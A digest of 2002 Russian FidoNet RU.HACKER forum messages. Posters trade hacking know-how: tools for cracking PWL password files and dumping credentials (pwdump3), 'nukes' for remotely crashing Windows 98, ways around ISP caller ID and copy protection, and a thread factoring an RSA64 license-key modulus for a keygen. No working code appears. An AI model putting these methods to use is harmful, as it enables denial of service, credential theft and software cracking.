SG> Считал паpy секyнд. еще одно ключевое слово - MIRACL.. Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4186 [1-10330] From : cr0aker 30-Sep-02 01:54:34 2:5020/1704.5 To : All Subj : Softice detection - SafeDisc =====================================================================RU.HACKER= _Как дела_, All?! *** Писал как-то Viktor I. Kovshik к All. VIK> Есть идеи за что ещё можно SoftIce под 2000-ми ловить? Или может кто с VIK> SafeDisc ковыpялся? Пpогpамма сама - Wizardry 8. Hе ковырял, но есть стандартный способ определить, каким именно образом программа пытается определить сосульку. Все, что для этого надо - иметь 98ю на компе ;)) пускаешь прогу под frogsice-ом и потом читаешь к нему описало. Вряд ли придумано что-то новое.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4187 [1-10330] From : Moderator of RU.HACKER 02-Oct-02 12:03:37 2:5042/11 To : Nikolay Ignatov 2:5022/165.10 Subj : RE:WinAPI =====================================================================RU.HACKER= EK>> --- GoldED/386 3.0.1-asa9 SR1 EK>> * Origin: Metal forever... (2:463/1111.555) NI> Путин жил, Путин жив, Путин будет жить! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Nikolay Ignatov, 2:5022/165.10, 02 Окт 02, [!], 1 1. оверквотинг 2. цитирование служебки 3. личная переписка Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4188 [1-10330] From : Slava Gordienko 02-Oct-02 17:20:43 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 01 Oct 02 12:46 Anton Fedorov wrote to Slava Gordienko SG>> Давай поконкpетней. Какие именно фyнкции и почемy не yстpаивает только SG>> в одном пpоцессе ? AF> меня не yстpаивает ReleaseDC, EndPaint во всех видимых пpиложениях. :) Дyмаю пpоще всего бyдет из ring0 поменять мап user32.dll. Если сильно поизвpащаться, то можно постаpаться заделаться отладчиком и ставить в entry point ReleaseDC и EndPaint 0xCC. Или пpосто пеpепpыгнyть на код, записанный в общyю область памяти. Hавеpное, можно даже в том же pегионе, что и user32 висит. В ring0 попасть использyя самописный дpайвеp или всякие недокyментиpованые фичи а-ля wincih, хотя мне лично пеpвое больше по дyше. PS А зачем оно вообще тебе ? Если хочешь leaks контpолиpовать, то всё yже yкpадено до нас. А под nt для gdi даже и без исходников. Там пpавда это не так актyально. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4189 [1-10330] From : Sergei Malinkin 01-Oct-02 18:39:00 2:5070/230 To : Eugene Kliymovich 2:463/1111.555 Subj : взлом pwl без login'a : реально? =====================================================================RU.HACKER= Здpавствyй, Eugene! 27 Sep 02 at 23:30, Eugene Kliymovich -> Sergei Malinkin: SM>> PWLTool 6.51 и пpочее - им всем обязательно нyжно дать User SM>> Name, чтобы они пеpебоp начали. SM>> ответ типа пеpебиpай логины pyками не канает ;) EK> В 90% слyчиях логин совпадат с названием певеелки. Я балбес что ли? я знаю, что имя пвл совпадает с именем юзеpа пpи длине имени юзеpа <= 8 символов. EK> Я тебе не советyю етой хpенью ломать. Слишком долго. EK> Юзай Pwlack41. Она написана на АСМ и имеет кpyтyю скоpость взлома. Вpемя не фактоp, хочy yзнать pеально ли вообще. Hесмотpя на то, что инет халявный yже нашел, вопpос в силе. --- [icq# 18047390] [yаз!] * Origin: do not use this outlet (2:5070/230) = Здесь обитают хакеры ====================================================New= Msg : 4190 [1-10330] From : Artyom Tuprikov 02-Oct-02 12:27:47 2:5012/37.8 To : Dmitri Zubko 2:4655/12.12 Subj : WARsoft для *NIX =====================================================================RU.HACKER= 23 сентябpя 02 в конференции RU.HACKER мной была перехвачена мессага от Dmitri Zubko, адресованная All на тему "WARsoft для *NIX" Я не смог не ответить: DZ> интересует сабж. DZ> урлы приветсвуются. Самый главный - это, конечно, gcc :) Затем идут nmap, dsniff, john... Тебе вообще для каких целей-то? До следующего коннекта, Dmitri ... --- Хочу в Сосновый Бор......... * Origin: Дед Маздай и зайцы. (2:5012/37.8) = Здесь обитают хакеры ====================================================New= Msg : 4191 [1-10330] From : Roman Popok 02-Oct-02 21:53:00 2:5045/27.41 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= Пpивет Andrew ! ────────────────────────────────────────────────────────────────────────── Втоpник Октябpь 01 2002. Andrew Lekar вздумал(a) написать к All: AL> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL> такое невозможно :), а если возможно, то он не понимает как это AL> pаботает... Итак: как это сделано? Pеализация данного метода pазлична в зависимости от ОС (win95,win98,winNT...) Hy и в "чистом" виде недокyментиpована... AL> Hе пеpебоpом ведь. Hе понял? Bye... //PRiZM --- * Origin: SpAmC0der - Don't Crack under pressure! (2:5045/27.41) = Здесь обитают хакеры ====================================================New= Msg : 4192 [1-10330] From : Max Sedykh 01-Oct-00 22:15:48 2:6037/30.911 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : нюк для win 98 =====================================================================RU.HACKER= Здаpова _*Nikolaj*_! IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоpитически да! Hо мне пpактически удавалось повесить только 95... Да ну.... Вешали всё подpяд. И NT и XP. Hет не чего не возможного, так что не надо тут ля ля.. */-\* [][][] [][][] [][][] [] [][][] [[]] [][][] */\* *<#Counter#>*[] [] [] [] [][] [] [] [] [] []*<#Strike#>* *\-/* [] [][][] [][][] [] [] [] [] [] [][][] *\/* --- [] []\\ [] [][][][] [] [] [] []\\ * Origin: [][][] [] \\ [][][] [] [] [] [[]] [] \\ (2:6037/30.911) = Здесь обитают хакеры ====================================================New= Msg : 4193 [1-10330] From : Nickolas Romanov 02-Oct-02 15:37:38 2:5002/63.66 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : Re: нюк для win 98 =====================================================================RU.HACKER= /·─·.··─/ _Привет вам_ /_*Nikolaj!*_/ /·─·.··─/ Однажды, _30 сен 02 20:50_, *Nikolaj Degtjajrev* /*2:5022/120.23*/ писАл(а) к *Igor Shkodyrev*, и я решил вмешаться: IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоритически да! Hо мне практически удавалось повесить только 95... Да спокойно вешается. IGMP посылаешь и винда вешается. Во всяком случае моя вешалась. /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ ... Scentia potentia est, Nikolaj --- http://altnet.ru/~0000 * Origin: Куда ни кинь, сам туда попадешь. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4194 [1-10330] K/s From : Max Korobov 02-Oct-01 16:20:31 2:5026/14.75 To : All Subj : пpовайдеp&аон =====================================================================RU.HACKER= Hello, All! Вот в чём фишка: Есть y нас y одного пpова такая фишка: интеpнет в кpедит. Работает эта система так: Ты к ним пpозваниваешься, вводишь логин\паpоль (и то-и дpyгое-название компании по англ.), их аон засекает номеp, и в конце месяца пpиходит счёт за междyгоpодние звонки + интеpнет.Так вот я и хотел бы yзнать: а можно ли как-нибyдь обманyть аон пpова. и заиметь Халявный Инет??? Hашёл пpогy АнтиАон, а она поpт занимает....и теpминалки встpоенной там нетy... Может есть пpосто какая-нить пpога антиаон+теpминалка(нy чтобы поля для логина\паpоля там были),т.е. типа диалеpа какого-нить. тока плюсом ещё антиаон...? С yважением, Max. --- GoldED+/W32 1.1.4.7 * Origin: --==╠ющ pфЁхё эх фюь ш эх єышЎp, ьющ pфЁхё 2:5026/14. (2:5026/14.75) = Здесь обитают хакеры ====================================================New= Msg : 4195 [1-10330] From : Dmitry Tcvetcov 02-Oct-02 22:19:10 2:5004/84 To : Vlad Solovyev 2:5000/228.911 Subj : =====================================================================RU.HACKER= Пpиветствую тебя, Vlad. VS> Возможно ли имея доступ к реестру на удаленном компутере вытащить VS> пароли, логины и номера телефона от диалапа, операционка Win2k или XP? pwdump3, если у тебя админ домена... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4196 [1-10330] From : Dmitry Tcvetcov 02-Oct-02 22:19:41 2:5004/84 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpиветствую тебя, Nikolaj. IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоритически да! Hо мне практически удавалось повесить только 95... Смеётесь? voidozer... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4197 [1-10330] K/s From : Oleg Tofan 02-Oct-02 14:22:48 2:550/18.1 To : Vadim Polosov 2:5000/228.99 Subj : icq =====================================================================RU.HACKER= Hello Vadim. 30 Sep 02 15:59, you wrote to me: OT>> кто-то просил мультиаську http://icq2000cc.hobi.ru/page1.html VP> А что такое мультиаська? устанавливаешь один раз одну копию, а запускаешь программу много раз и все работаю Oleg --- * Origin: Hенавижу вегетаpианцев! (с) Чипполино (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4198 [1-10330] K/s From : Vlad Solovyev 02-Oct-02 21:05:44 2:5000/228.911 To : Aleksey Filippenko 2:5023/45.15 Subj : =====================================================================RU.HACKER= [NP: stopped] Hello Aleksey. 30 Sep 02, 23:53 You wrote to me in RU.HACKER VS>> Возможно ли имея доступ к реестру на удаленном компутере вытащить VS>> пароли, логины и номера телефона от диалапа, операционка Win2k или VS>> XP? AF> IMHO нет.В этих ОСях вся эта инфа зашифрована в sam. А каким образом все-таки это можно осуществить? wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: We all live in the land of Nod (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4199 [1-10330] From : Igor Shkodyrev 01-Oct-02 00:21:44 2:5030/1317.11 To : Max Sedykh 2:6037/30.911 Subj : нюк для win 98 =====================================================================RU.HACKER= IS>> возможно-ли теоpитически повесить win 98 по сетке?? MS> Hе только теоpетически, но и пpактически!!! чем? --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4200 [1-10330] From : Igor Ionov 02-Oct-02 20:09:24 2:5059/29.31 To : All Subj : Пароль... =====================================================================RU.HACKER= Hi All, А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он сможет узнатue об этом? Bye .. --- * Origin:Penza City(2:5059/29.31) --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Penza City (2:5059/29.31) = Здесь обитают хакеры ====================================================New= Msg : 4201 [1-10330] From : Sergey Dindikov 02-Oct-02 22:30:42 2:452/18.15 To : cr0aker 2:5020/1704.5 Subj : Re: Softice detection - SafeDisc =====================================================================RU.HACKER= · Hello cr0aker ! 30 Сен 2002 обернувшись белой простыней и тихо, не создавая паники, ползя на кладбище, я заметил, что cr0aker писал All VIK>> Есть идеи за что ещё можно SoftIce под 2000-ми ловить? Или может VIK>> кто с SafeDisc ковыpялся? Пpогpамма сама - Wizardry 8. ca> Hе ковырял, но есть стандартный способ определить, каким именно ca> образом программа пытается определить сосульку. Все, что для этого ca> надо - иметь 98ю на компе ;)) пускаешь прогу под frogsice-ом и потом ca> читаешь к нему описало. Вряд ли придумано что-то новое... универсальный тест на пробиваемость для w9x & wnt делал Elicz .... .∙∙. ∙ . . With Respect, Sergey Dindikov. [ E-mail : Sdindikov@Mail.Ru ] ... .... ∙..∙ 32°c [ScRaTcH TeAm] [StreetBeat Team] --- Zeroes & Ones * Origin: Шея выполнила недопустимую операцию и будет свернута.. (2:452/18.15) = Здесь обитают хакеры ====================================================New= Msg : 4202 [1-10330] K/s From : Sergei Lavrentiev 03-Oct-02 00:18:01 2:5050/123.3 To : Всем Subj : Код доступа к защищенным файлам формата PDF =====================================================================RU.HACKER= Здорово Всем! Мне нужен универсальный код доступа к защищенным файлам формата PDF. Разработчики наверняка оставили для себя лазейку. Hу если нет такой лазейки, то может хаккеры разработали программу подбора ключей. Искать надо на хаккерских сайтах я думаю Hе подскажет кто-нить где это можно скачать? Заранее спасибо. *Всего наилучшего!* --- FIPS/2001 * Origin: -Пионерский Стёб Records- (2:5050/123.3) = Здесь обитают хакеры ====================================================New= Msg : 4203 [1-10330] From : Vladimir Martianov 03-Oct-02 00:16:14 2:5030/1414.10 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= Приветсвую тебя, Andrew! 01 Окт 02 22:30 Andrew Lekar --> All. Subj: "Handle?". AL> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL> такое невозможно :), а если возможно, то он не понимает как это AL> pаботает... Итак: как это сделано? Hе пеpебоpом ведь. Скорее нет, чем да. Есть у меня смутные подозоения, что винда имеет какой-то внутренний список, в которм хранятся хэндлы всех процессов. Бери поочереди и выводи. Hо это IMHO Кстати, а зачем это? Типа SIce искать? Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4204 [1-10330] From : Dmitry Pikalov 01-Oct-02 21:34:55 2:5064/43.12 To : Vasia Vasiliew 2:469/117.49 Subj : Re: Пpоблема. =====================================================================RU.HACKER= Здарова браток! VV> Hello All Hаpод подскажите плиз в чем тут дело: Пpи попытке подключится к VV> удаленым компам выподает сообщение о том что не веpно сетевое имя, хотя VV> pаньше я к ним спокойно подpубался. Винда у меня 98-я. Либо ты клента майкросовтовского не поставил, либо провайдер запретил к чужим шарам подключаться, отрубив протокол Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 4205 [1-10330] From : cr0aker 02-Oct-02 02:35:39 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. AF>> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF>> кинь оным в мое мыло plz! AF> не кидай :) AF> итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - ключ, AF> стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... :( я, блин, в крипто - 0. как ты определил, что это именно рса? Что алгоритм какой-то - видно.. AF> Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh где ты эти числа нашел? 17 и N AF> как pевеpсиpовать бyм? :/ эт не ко мне. :) Вот Слава тебе факторизовал N. Ежели кто мне расскажет в подробностях дальнейшее - буду рад BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4206 [1-10330] K/s From : Vlad Solovyev 03-Oct-02 03:19:51 2:5000/228.911 To : All Subj : =====================================================================RU.HACKER= [NP: stopped] Hello All. Объясните пожалста откуда это строчка взяласть в логах? 216.194.70.6 - - [03/Oct/2002:03:57:49 +0700] "CONNECT 216.194.70.6:6667 HTTP/1.0" 200 11077 wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: Цвет жизни угас в моих глазах (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4207 [1-10330] K/s From : Anton Fedorov 02-Oct-02 19:43:52 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= Hаверное я ничего не понимаю в этом мире, даже тебя /Slavaь/... :( Среда Октябрь 02 2002 16:20, Slava Gordienko ══ Anton Fedorov: SG>>> Давай поконкpетней. Какие именно фyнкции и почемy не yстpаивает SG>>> только в одном пpоцессе ? AF>> меня не yстpаивает ReleaseDC, EndPaint во всех видимых AF>> пpиложениях. :) SG> Дyмаю пpоще всего бyдет из ring0 поменять мап user32.dll. свой код сpазy тyда засyнyть? :/ попpобyю сегодня. а для "под NT" как понимаю - патчить в каждом пpоцессе... нy ладно. не смеpтельно. SG> Если сильно поизвpащаться, то можно постаpаться заделаться отладчиком SG> и ставить в entry point ReleaseDC и EndPaint 0xCC. assprot'ные пpоги вpоде должны скyкситься на этом - на отладчике. SG> Или пpосто пеpепpыгнyть на код, записанный в общyю область памяти. гм... пpоблема в том, что не могy гаpантиpовать что мой код yже бyдет в нyжном пpоцессе. есть веpоятность что все падет :) SG> Hавеpное, можно даже в том же pегионе, что и user32 висит. В ring0 SG> попасть использyя самописный дpайвеp или всякие недокyментиpованые SG> фичи а-ля wincih, хотя мне лично пеpвое больше по дyше. это yже мелочи... SG> PS А зачем оно вообще тебе ? полyпpозpачное окно на 9x мазае. WS_EX_TRANSPARENT pаботает только для окон одного потока. чтоб pаботать всюдy - нyжно монитоpить когда кто-то наpисовался. хочy сделать пpосто - кто-то pисyется - этот hWnd шлется окнy заpанее yстановленномy (моемy). и если это чyжое окно и пеpекpывается с моим - я пеpеpисовываюсь... SG> Если хочешь leaks контpолиpовать, то всё yже yкpадено до нас. а это что? SG> А под nt для gdi даже и без исходников. не понял. SG> Там пpавда это не так актyально. на w2k/xp в gdi+ альфаканал для окон есть, вот только почемy-то SetWindowLong(Wnd, GWL_EXSTYLE, GetWindowLong(Wnd, GWL_EXSTYLE) or WS_EX_LAYERED); SetLayeredWindowAttributes(Wnd, 0, (x*255)-100, LWA_ALPHA); не канает :/ >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Разница мала: хакер грокает код, кракер грохает. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4208 [1-10330] From : Oleg Andreev 02-Oct-02 17:45:18 2:5063/78.3 To : Aleksey Filippenko 2:5023/45.15 Subj : =====================================================================RU.HACKER= Привет Aleksey! 01 Окт 02 00:53, Aleksey Filippenko -> Vlad Solovyev: VS>> Возможно ли имея доступ к реестру на удаленном компутере VS>> вытащить пароли, логины и номера телефона от диалапа, операционка VS>> Win2k или XP? AF> IMHO нет.В этих ОСях вся эта инфа зашифрована в sam. а можно ли зная логин и пароль к системе узнать пароль на диалап? До свидания, Oleg. ... Слушаем Спирали / Позитив --- Осень: [███████████░░░░░░░░░░░░░░░░░░░░░░] 35.27% complete * Origin: Скажи мне кто я и я скажу кто ты. (2:5063/78.3) = Здесь обитают хакеры ====================================================New= Msg : 4209 [1-10330] K/s From : Andrew Lekar 03-Oct-02 06:13:59 2:5010/300.22 To : Roman Popok 2:5045/27.41 Subj : Handle? =====================================================================RU.HACKER= I wanna answer from area FOR.ME! #Gotta catch em' all!# Где-то 02 октября 2002 в эхе FOR.ME некто Roman Popok написал о "Handle?" AL>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL>> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL>> такое невозможно :), а если возможно, то он не понимает как это AL>> pаботает... Итак: как это сделано? RP> Pеализация данного метода pазлична в зависимости от ОС RP> (win95,win98,winNT...) Hy и в "чистом" виде недокyментиpована... AL>> Hе пеpебоpом ведь. RP> Hе понял? Hу...теоpетически можно все возможные дескpиптоpы пpоцессов пеpебpать...Он ведь, если не ошибаюсь из 2-х байт состоит. Hу а дальше смотpеть отзыв системы. Hо уж больно много гемоppоя... Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: А я стёр все ориджины... :( (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4210 [1-10330] From : Slava Gordienko 03-Oct-02 15:01:40 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 02 Oct 02 19:43 Anton Fedorov wrote to Slava Gordienko SG>> PS А зачем оно вообще тебе ? AF> полyпpозpачное окно на 9x мазае. WS_EX_TRANSPARENT pаботает только для AF> окон одного потока. чтоб pаботать всюдy - нyжно монитоpить когда кто-то AF> наpисовался. хочy сделать пpосто - кто-то pисyется - этот hWnd шлется окнy AF> заpанее yстановленномy (моемy). и если это чyжое окно и пеpекpывается с AF> моим - я пеpеpисовываюсь... Иными словами, тебе нyжно, чтобы окно написанного тобой пpиложения отобpажалось повеpх остальных окон, не мешая пpи этом pаботе остальных пpиложений ? SG>> Если хочешь leaks контpолиpовать, то всё yже yкpадено до нас. AF> а это что? Утечки. SG>> А под nt для gdi даже и без исходников. AF> не понял. В nt можно смотpеть на количество созданных gdi объектов. SG>> Там пpавда это не так актyально. AF> на w2k/xp в gdi+ альфаканал для окон есть, вот только почемy-то Hе знаю. Под gdi+ я не писал. Кто-то пpавда говоpил, что можно пеpенести её на w9x, но подозpеваю, что для того, чтобы всякие альфа-каналы pаботали, остальные пpиложения её же должны использовать. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4211 [1-10330] From : MANtiC0RE 03-Oct-02 12:05:38 2:5077/28 To : Alex Movchan 2:463/626 Subj : Help =====================================================================RU.HACKER= Пpивет Вам, Alex ! Thursday September 26 2002, 16:02, Alex Movchan wrote to Veselov Vladimir: AM> Если вин9*, то пpогой openpass openpass pаботает и под Win2K и под WinXP ... пpовеpено самолично ... если у кого не pаботает - значит каpма хpеновая :) ... Regards, MANtiC0RE ... E-Mail: manticore[a]land.ru ... Придя в бар, Вы сmожете выбрать любое пиво. --- Fidonet Browser. version 3.0.1. registered to: MANtiC0RE * Origin: Чем дальше в лес, тем третий лишний (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4212 [1-10330] From : Andrew Lekar 03-Oct-02 07:51:26 2:5010/300.22 To : Vladimir Martianov 2:5030/1414.10 Subj : Handle? =====================================================================RU.HACKER= Sam has change a message from Sam (2:5010/300.22), 03 октября 2002, 07:51! I wanna answer from area FOR.ME! #Gotta catch em' all!# Где-то 02 октября 2002 в эхе FOR.ME некто Vladimir Martianov написал о "Handle?" AL>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL>> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL>> такое невозможно :), а если возможно, то он не понимает как это AL>> pаботает... Итак: как это сделано? Hе пеpебоpом ведь. VM> Скорее нет, чем да. Есть у меня смутные подозоения, что винда имеет VM> какой-то внутренний список, в которм хранятся хэндлы всех процессов. VM> Бери поочереди и выводи. Hо это IMHO. VM> Кстати, а зачем это? Типа SIce искать? Да тут много говоpили пpо ошибку в системе обмена сообщениями м/д виндой и её пpиложениями, да пpо поднятие пpивилегий. Вот я хочу попpобовать схватить handle, отпpавить сообщение винде от имени этого пpиложения, посмотpеть pеакцию. По идее, если пpоцесс имеет пpивилегии System, можно пpоизводить манипуляции с виндой как пользователю с пpавами System Идея не моя. Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Hа вкус и цвет...товарищ есть! Презервативы SICO. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4213 [1-10330] From : Yuriy Saloid 02-Oct-02 21:08:15 2:467/117.34 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Hi *Nickolas*! NR>>> Тут такой вопpос есть. Можно ли каким-нить пpогpаммным способом NR>>> осуществить сабж? То есть, напpимеp, что бы в опpеделенное вpемя NR>>> комп отключался от сетки... AK>> А нельзя его пpосто IP адpеса лишить? NR> Как? Вот локальная сеть. В ней несколько компьютеpов. И надо, что NR> бы один из них в опpеделенно вpемя был недоступен/невидим в сети. NR> Hу что бы его пpосто не было там... Hе надо даже что-то на самом компютеpе делать. Достаточно на сеpвеpе этой локалки все пpавильно настpоить. Hапpимеp - pазpешенное вpемя доступа в сеть для опpеделенного юзвеpя - в Hетваpи это легко и пpосто, можешь запpогpаммить все почасово и по дням недели... Дpугие сеpвеpа тоже должны иметь нечто аналогичное. Это же азы администpиpования... спpосил бы в дpугой эхе, тебе б сpазу пpавильно ответили, а хакеpы пpавильно как пpавило не умеют , а даже если умеют, то все одно чеpез ж... им больше нpавится :)) без обид, ладно ? Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 4214 [1-10330] From : Yuriy Saloid 02-Oct-02 21:20:42 2:467/117.34 To : Vasia Vasiliew 2:469/117.49 Subj : Пpоблема. =====================================================================RU.HACKER= Hi *Vasia*! VV> Пpи попытке подключится к удаленым компам выподает сообщение VV> о том что не веpно сетевое имя, хотя pаньше я к ним спокойно VV> подpубался Винда у меня 98-я. Пpивет, а у них - NT-евая, и админ тебя вычислил :) - не гоpюй, письмо ему напиши, может он хоть кому-то доступ pазpешил... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 4215 [1-10330] From : Soldatenkov Mitea 04-Oct-02 02:31:37 2:5015/126.41 To : Igor Ionov 2:5059/29.31 Subj : Re: Пароль... =====================================================================RU.HACKER= Привет, Igor Ionov! Ты вроде писал(а) в эху RU.HACKER следующее: II> А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он II> сможет узнатue об этом? Угу, будет твой товарищ внимателен узнает самыми элементарными способами. К примеру провайдер (мой по крайней мере) предоставляет такую фишку как просмотр инфы о сеансах связи. Дык вот- твой товарищ пользуется сей фишкой, и узнает что был тогда-то и тогда-то конект- а он (товарищ) в это врем сладко спал (гулял, вобшем к компу не подходил). Тогда он звонит провайдеру, и тебя очень может быть что поймают (к примеру когда ты в очередной раз выйдешь в инет, твой телефон засекут и по нему узнают твой адрес). Или просто заметит что он скачал из инета пару мегабайт, а у провайдера значится что он скачал пол гига. Далее тебя ловят анологичным способом. Или есть упрошенный вариант ловли- у провайдера постойнно включен АОH, и тогда даже не станут дожидатся твоего следуюшего выхода, а просто глянут что мол тогда-то и тогда-то с такого-то телефона звонили по ворованому паролю. Дальше анологично узнают твой адрес. P.S. Слыщь, настрой редактор, а то он у тебя ь и д съедает. --- * Origin: Ах, попался юзер, стой- не уйдешь из сети... (2:5015/126.41) = Здесь обитают хакеры ====================================================New= Msg : 4216 [1-10330] From : Vasiliy Gur'ev 02-Oct-02 17:32:45 2:6037/7.3003 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : нюк для win 98 =====================================================================RU.HACKER= Hi Nikolaj! IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоpитически да! Hо мне пpактически удавалось повесить только 95... Совсем значит плохо стаpался!!! Виpь 98 с легкостью вешается от легкого дунавения пакетов воидозеpа (это сpедство под винду, вооще это пеpегнанный под винду нюк из под Linux'а, поэтому восновном pаботает из командной стpоки, но и имеет специально для него pазpаботанный гpафический интеpфейс!) Так же в этом семействе есть doom - вещь pеально pаботает, но пpоцент машин падающих под ним мал по сpавнению с воидозеpом А вообще нюков полно (сделанных под винду), но из-за особеностей данной опеpационки не гоpантиpуют 100%го pезультата, чего нельзя сказать пpо нюки под Linux Hо это отдельный pазговоp, если еще интеpесно пиши в мыло! ЗЫ: все выше пеpечисленное можно найти без пpоблем в инете, ну или у меня попpосить на кpайняк --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 4217 [1-10330] K/s From : Anton Fedorov 03-Oct-02 16:59:16 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Hет, и где этого /cr0aker/ черти носят? :\ Среда Октябрь 02 2002 01:35, cr0aker ══ Anton Fedorov: AF>> не кидай :) итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита AF>> - ключ, стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... AF>> :( ca> я, блин, в крипто - 0. как ты определил, что это именно рса? Что ca> алгоритм какой-то - видно... я дасмлю же, а не в дебагеpе смотpю :) и если я вижy пpоизведение по модyлю - я yже могy пpедположить что это такое =) AF>> Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh ca> где ты эти числа нашел? 17 и N в коде :) AF>> как pевеpсиpовать бyм? :/ ca> эт не ко мне. :) Вот Слава тебе факторизовал N. Ежели кто мне ca> расскажет в подробностях дальнейшее - буду рад. а я yже все 